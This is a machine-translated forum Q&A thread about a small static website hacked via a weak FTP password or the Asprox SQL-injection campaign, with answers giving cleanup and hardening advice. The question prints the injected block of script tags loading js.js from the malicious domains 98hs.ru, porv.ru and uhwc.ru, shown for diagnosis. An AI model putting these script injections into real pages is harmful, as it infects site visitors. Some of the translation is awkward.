security -我的网站被黑了。。我该怎么办?

Translate

我父亲今天给我打电话,说去他网站的人感染了168种试图下载到他们计算机上的病毒。他一点也不精通,并使用所见即所得的编辑器来构建整个程序。

我打开他的网站打开并查看了源代码,在源代码的底部,在关闭HTML标记之前有一行Javascript包含。他们包括了这个文件(还有许多其他文件):http://www.98hs.ru/js.js<-在转到该URL之前,请关闭JAVASCRIPT。

所以我暂时将其注释掉。事实证明,他的FTP密码是一个普通的字典单词,长度为6个字母,因此我们认为这就是被黑客入侵的方式。我们已将他的密码更改为8位以上的非单词字符串(由于他是hunt-n-peck打字员,因此他不会输入密码)。

我做了一个Whois在98hs.ru并发现它是从智利的一台服务器托管的。实际上也有一个与此相关的电子邮件地址,但我严重怀疑此人是罪魁祸首。可能只是其他一些被黑客入侵的网站...

我现在不知道该怎么办,因为我以前从未处理过这类事情。有人有什么建议吗?

他正在通过webhost4life.com使用纯jane非安全ftp。我什至没有办法dosftp在他们的网站上。我在想他的用户名和密码被拦截了吗?

因此,为了使它与社区更加相关,应采取哪些步骤/应采取的最佳做法来保护您的网站免遭黑客攻击?

作为记录,这是“神奇地”添加到他的文件中的代码行(并且不在他计算机上的文件中-我将其注释掉只是为了确保绝对不会做任何事情)在此页面上,尽管我确信Jeff将对此保持警惕):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
This question and all comments follow the "Attribution Required."

所有的回答

Translate

尝试收集尽可能多的信息。查看主机是否可以为您提供一条日志,显示与您的帐户建立的所有FTP连接。您可以使用它们来查看是否甚至是用于进行更改并可能获得IP地址的FTP连接。

如果您使用的是预装的软件,如Wordpress,Drupal或其他未编写代码的软件,则上传代码中可能存在漏洞,允许进行此类修改。如果是自定义构建的,请仔细检查您允许用户上传文件或修改现有文件的所有位置。

第二件事是按原样转储该站点,并检查所有内容以进行其他修改。他们可能只是进行了一次修改,但如果他们通过FTP进入,他知道那里还有什么。

将您的网站恢复为已知的良好状态,并在需要时升级到最新版本。

您还必须考虑一定程度的回报。造成损失的价值值得尝试追踪此人吗?或者这只是您生活,学习和使用更强密码的地方?

来源
Translate

我知道这还算晚了一点,但是JavaScript提到的URL在已知于6月份启动的ASPRox机器人复兴活动的一部分站点中被提及(至少那是我们被标记为它)。以下是有关它的一些详细信息:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

令人讨厌的事情是,实际上数据库中的每个varchar类型字段都被“感染”,以吐出对此URL的引用,在该URL中,浏览器得到一个很小的iframe,将其变成机器人。可以在这里找到基本的SQL修复程序:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

不过,令人恐惧的是,该病毒会在系统表中寻找要感染的值,并且许多共享的托管计划还为其客户端共享数据库空间。因此,很有可能甚至不是您父亲的站点被感染,而是他的托管群集中的其他人的站点编写了一些不良代码并为SQL Injection攻击打开了大门。

如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并给他们一个指向该SQL代码的链接,以修复整个系统。您可以修复自己的受影响的数据库表,但最有可能是正在进行感染的bot会再次通过该漏洞,并感染整个感染。

希望这可以为您提供更多信息。

编辑:再想一想,如果他使用主机在线设计工具之一来构建自己的网站,则所有这些内容可能都位于一列中,并因此受到感染。

来源
Translate

您提到您父亲正在使用网站发布工具。

如果发布工具从他的计算机发布到服务器,则可能是他的本地文件是干净的,而他只需要重新发布到服务器即可。

他应该查看服务器是否有不同于普通FTP的登录方法,但这不是很安全,因为它通过Internet以明文形式发送密码。

来源
Translate

拥有六个字字符的密码,他可能已经被强行强迫。这比他的ftp被拦截的可能性更大,但也有可能。

从更强的密码开始。 (8个字符仍然相当弱)

查看此链接是否链接到互联网安全博客是有帮助的。

来源
Kev
Translate

该网站只是纯静态HTML吗?也就是说,他没有设法为自己编写一个上传页面,该页面允许任何开车经过的人上传受感染的脚本/页面?

为什么不问webhost4life他们是否有任何FTP日志并向他们报告问题。您永远不会知道,他们可能会很乐于接受,并为您找出到底发生了什么?

我为一家共享主机托管服务公司工作,我们始终欢迎此类报告,并且通常可以查明确切的攻击源,并就客户出问题的地方提出建议。

来源
Translate

拔掉网络服务器的电源而不关闭它,以避免关闭脚本。通过另一台计算机将硬盘作为数据驱动器进行分析,看看是否可以通过日志文件和类似性质的东西来确定罪魁祸首。验证代码是否安全,然后从备份中还原。

来源
Translate

这发生在最近由ipower托管的我的一个客户身上。我不确定您的托管环境是否基于Apache,但是是否一定要仔细检查您未创建的.htaccess文件,尤其是在webroot上方和映像目录内部,因为它们倾向于在其中注入一些麻烦以及(他们根据参考人来自何处将他们重定向)。还要检查您为未编写的代码创建的任何内容。

来源
Translate

显然我们是被同一个人砍死的!在我们的情况下,还是机器人。他们在一些旧的经典ASP站点上的URL中使用了SQL注入,现在没人再维护了。我们发现了攻击IP,并在IIS中将其阻止。现在,我们必须重构所有旧的ASP。因此,我的建议是先查看IIS日志,以查找问题是否出在您网站的代码或服务器配置中。

来源